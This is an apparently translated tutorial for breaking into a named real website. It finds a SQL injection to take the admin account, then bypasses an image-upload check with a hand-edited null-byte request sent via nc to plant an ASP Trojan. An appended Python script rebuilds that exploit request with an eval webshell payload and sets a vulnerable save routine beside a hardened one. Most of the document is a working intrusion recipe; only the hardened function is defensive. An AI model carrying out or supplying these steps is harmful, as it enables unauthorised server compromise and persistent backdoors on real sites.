Browse the structure of the website and look for an interface like http://www.fzz8.cn/index.asp?id=14. Append a single quotation mark, http://www.fzz8.cn/index.asp?id=14', and press Enter (Figure 1).
An SQL injection vulnerability exists there. My plan was to use the SQL injection to obtain the site administrator's account, log in to the admin backend with it, and then upload an ASP Trojan. I used a tool to get into the backend and then looked for further vulnerabilities there. As expected, I found an image upload interface (Figure 2).
Checking the page source shows that the upload function is vulnerable: it is the same filepath-variable problem as the 6kbbs upload vulnerability from a few days earlier (Figure 3).
Next, upload the ASP Trojan. Select the ASP Trojan in the upload form, but do not click the Upload button yet (Figure 4).
Then start capturing packets with WSockExpert (Figure 5).
Go back to IE and submit the upload. After clicking the Upload button, the page reports an error: the upload failed because the file format is incorrect. That is expected (it would be strange if it succeeded).
Go back to the capture tool and check the results. WSockExpert recorded the whole submission I just made (Figure 6).
Copy lines 3 and 4 into a text file. Note that the line breaks (the carriage returns) must be copied as well. Save it as 2.txt (Figure 7).
Now edit this file. First change the file name: find filename="D:\Documents and Settings\Administrator\Desktop\Wenzhang\shadow.asp" and change the .asp suffix to an image extension (Figure 8). Then, after the upload directory, add the file name you want the file saved as, and leave one space after that name (Figure 9).
Next, open 2.txt in UltraEdit-32, find the string /upload/shadow.asp, and switch to Edit --> Hex Functions --> Hex Edit. Find the byte for the space immediately before the 0D (the carriage return) and change it from 20 to 00 (Figure 10). Save and exit. The request is now in the form we need. Overwriting the space rather than deleting it keeps the request the same length, so the Content-Length header captured from the browser is still correct.
Now submit it.
Open cmd, change to the nc directory, and send the data with nc using the following command:
nc www.traget.com 80 < 2.txt
The response comes back almost immediately, telling us "the file has been uploaded successfully!" and giving the path and file name of the file: upload/shadow.asp (Figure 11).
What are you waiting for? Open IE and check whether the ASP file is really there: http://www.trget.com.cn/upload/shadow.asp (Figure 12). With this, what ASP backdoor can't be uploaded? Most people know the cause of this vulnerability, so many websites have fixed it, but some programs still do not account for it when handling the file name: the extension check passes on the renamed file, while the saved path is cut off at the null byte.
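The following is an added example, not code from the original article or from the target site. It reproduces in Python the request the article assembles by hand with WSockExpert, UltraEdit and nc (rename the file to an image extension, put the wanted .asp name in the directory field with a trailing space, overwrite that space with 0x00), and it models the server-side path handling that makes the trick work, next to a hardened version. The host name, the form field names ("filepath" and "file"), the upload script path and the generated file name are assumptions chosen for illustration.

```python
# Added example, not code from the original article: builds the
# null-byte upload request the article edits by hand and models the
# server-side save logic that truncates at the null byte.
# Host, field names, script path and generated name are assumptions.

BOUNDARY = "---------------------------7d4a6d158c9"   # constructed boundary
ASP_SHELL = b'<%eval request("cmd")%>'               # placeholder file body
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}
UPLOAD_DIR = "/upload/"                              # server-side constant


def build_upload_request(host, upload_dir, saved_name, local_filename,
                         file_bytes, filepath_field="filepath",
                         file_field="file"):
    """Return the raw HTTP POST, edited the way the article edits 2.txt:
    the directory field carries the wanted .asp name plus a trailing
    space, and the uploaded file is renamed to an image extension so the
    extension check passes."""
    b = BOUNDARY.encode()
    body = b"--" + b + b"\r\n"
    body += b'Content-Disposition: form-data; name="' + filepath_field.encode() + b'"\r\n\r\n'
    body += (upload_dir + saved_name + " ").encode() + b"\r\n"   # space patched later
    body += b"--" + b + b"\r\n"
    body += (b'Content-Disposition: form-data; name="' + file_field.encode() +
             b'"; filename="' + local_filename.encode() + b'"\r\n')
    body += b"Content-Type: image/jpeg\r\n\r\n" + file_bytes + b"\r\n"
    body += b"--" + b + b"--\r\n"
    head = ("POST /upload.asp HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


def patch_null_byte(request, filepath_field="filepath"):
    """The UltraEdit step: find the space just before the 0D 0A that ends
    the filepath value and overwrite 0x20 with 0x00. The length is
    unchanged, so the captured Content-Length stays valid."""
    marker = b'name="' + filepath_field.encode() + b'"\r\n\r\n'
    start = request.index(marker) + len(marker)
    end = request.index(b"\r\n", start)
    if request[end - 1:end] != b" ":
        raise ValueError("expected a trailing space before CRLF")
    return request[:end - 1] + b"\x00" + request[end:]


def vulnerable_save_path(filepath, client_filename, generated="20040901123456"):
    """Model of the classic ASP upload component: the extension is checked
    on the client-supplied file name, the save path is the client-supplied
    directory plus a generated name, and the file API underneath treats
    the string as NUL-terminated, so everything after 0x00 is dropped."""
    ext = client_filename[client_filename.rfind("."):].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("file format is incorrect")
    full = filepath + generated + ext
    return full.split("\x00", 1)[0]


def hardened_save_path(client_dir, client_filename, generated="20040901123456"):
    """Fixed version: the directory comes from server configuration, any
    control character in a client field is rejected, and the extension is
    whitelisted only after that check."""
    for value in (client_dir, client_filename):
        if any(ord(c) < 0x20 or c == "\x7f" for c in value):
            raise ValueError("control character in client field")
    dot = client_filename.rfind(".")
    ext = client_filename[dot:].lower() if dot >= 0 else ""
    if ext not in ALLOWED_EXT:
        raise ValueError("file format is incorrect")
    return UPLOAD_DIR + generated + ext


if __name__ == "__main__":
    req = build_upload_request("www.target.example", "/upload/", "shadow.asp",
                               "shadow.jpg", ASP_SHELL)
    patched = patch_null_byte(req)
    print(patched.decode("latin-1"))
    print(vulnerable_save_path("/upload/shadow.asp\x00", "shadow.jpg"))
```

Writing the patched bytes to a file and sending them with nc, as the article does, gives the same request; the point of the two save-path functions is that the vulnerable one returns /upload/shadow.asp for the patched request while the hardened one refuses it and never lets the client choose the directory at all.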